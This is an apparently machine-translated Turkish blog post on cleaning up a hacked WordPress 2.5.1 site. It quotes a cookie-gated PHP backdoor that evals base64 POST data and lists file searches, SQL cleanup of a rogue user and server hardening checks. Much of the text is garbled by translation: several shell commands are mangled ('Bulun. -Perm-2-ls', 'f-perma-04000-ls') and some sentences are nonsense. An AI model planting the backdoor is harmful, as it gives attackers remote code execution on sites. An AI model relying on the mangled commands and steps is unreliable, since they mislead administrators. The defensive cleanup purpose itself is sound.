Bu yazıyı okumadan önce, görmelisiniz yazı burada, Bir şey anlamak için. :)
Birkaç blog dosyasında buldum stealthsettings.com'a aşağıdakine benzer kodlar bulaşması sonucu ortaya çıktı başarı WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Bu dosya yukarıda ise xmlrpc.php arasında UykuluAma bir de grep sunucu, kaynak kodunu kendi türünde epeyce olduğunu görebilirsiniz.

Virüslü dosyaları temizleme:
Ooookkkk ...
1. En iyi çözüm, bu evlilikten sonra yedekVe temizlenmiş veritabanı için silme Dosyaları WordPress (wp-config.php'yi ve kesinlikle wp platformuyla ilgili olmayan dosyaları dikkatlice kontrol edildikten sonra saklayabilirsiniz) sunucudan ve orijinal olanları sürümden yükleyin 2.5.1 (Bu esnada bir WP sürüm yükseltme :) yapmak) http://wordpress.org/download/ . Onların Titiz kontrole güven yoksa tema dosyaları da dahil olmak üzere silin.
Bu etkilenmiş görünüyor ve blogda daha önce kullanılan ve sadece temayı değiştirerek henüz temaları dosyaları, sorunu çözmez.
./andreea/wp-content/themes/default/index.php:
2. Içeren tüm dosyaları arayın ve silin: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg ve dosya wp-info.txt varsa....
bul. -name “* _new.php”
bul. -name “* _old.php”
bul. -name “* .jpgg”
bul. -name “* _giff”
bul. -name “* _pngg”
bul. -name “wp-info.txt”
3. içinde / Tmp , Arama ve benzeri klasörleri silmek tmpYwbzT2
SQL Temizleme :
1. Tablo Tablo wp_options çizgiler silmek olup olmadığını görmek: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Hepsi wp_ içindeoptions, git active_plugins uzantıları * _new.php, * _old.php, *. jpgg, *. giff, *. pngg veya başka bir uzantısı olduğundan şüphelenildiği takdirde dikkatlice kontrol birinde biten bir eklenti varsa ve silin.
3. Tablo wp_usersOnun sağ bir şey yazmamış bir kullanıcı, sütun varsa, bakınız user_nicename. Bu kullanıcıyı silin, ancak kimlik sütunundaki numarayı unutmayın. Bu kullanıcı muhtemelen "WordPress"CA user_login 00: 00 00-0000-00 ve 00 oluşturulmuş gibi görünüyor.
4. Tablo git wp_usermeta ve yukarıda kimliği ait bütün satırları silin.
Bu sql temizliğini yaptıktan sonra, herhangi bir eklentiyi devre dışı bırakın ve ardından etkinleştirin. (blogda -> Gösterge Tablosu -> Eklentiler)
Güvenli sunucu:
1. "Dizin ve dosyaları ne bakyazılabilir"(chmod 777) ve bir koymaya çalışın chmod bu da artık herhangi bir düzeyde yazmalarına izin vermeyecek. (chmod 644, örneğin)
Bulun. -Perm-2-ls
2. Dosyaları bit kümesi ne var bakın suid veya sgid . Kullanmak istemiyorsanız, bu dosyaları onları koymak chmod 0 veya içerdiği paketi kaldırmak. Onlar "ayrıcalıklar yürütmek, çünkü çok tehlikeliGrup"Ya da"kök"Ve normal kullanıcı ayrıcalıkları ile bu dosyayı yürütmek için değil.
f-perma-04000-ls / tipi bulabilirsiniz
f-perma-02000-ls / tipi bulabilirsiniz
3. Hangi portların açık olduğuna kontrol edin ve alışık olmadığımız bu kapatma veya sabitlemek için deneyin.
netstat-an | grep-i dinle
Onun hakkında. Görüyorum Bazı bloglar yasaklandı de Google Search ve diğerleri "Onları iyi yaptı!!!" . Şey, onlar için yapardım... ama Google yasaklamaya başlarsa ne dersin? tüm siteler şekillendirme SPAM IS ve (Truva atları koymakTrojan.Clicker.HTML) çerezlerde?
1 düşünce "WordPress Exploit - Virüs dosyalarını, SQL'i ve sunucu güvenliğini temizleyin. ”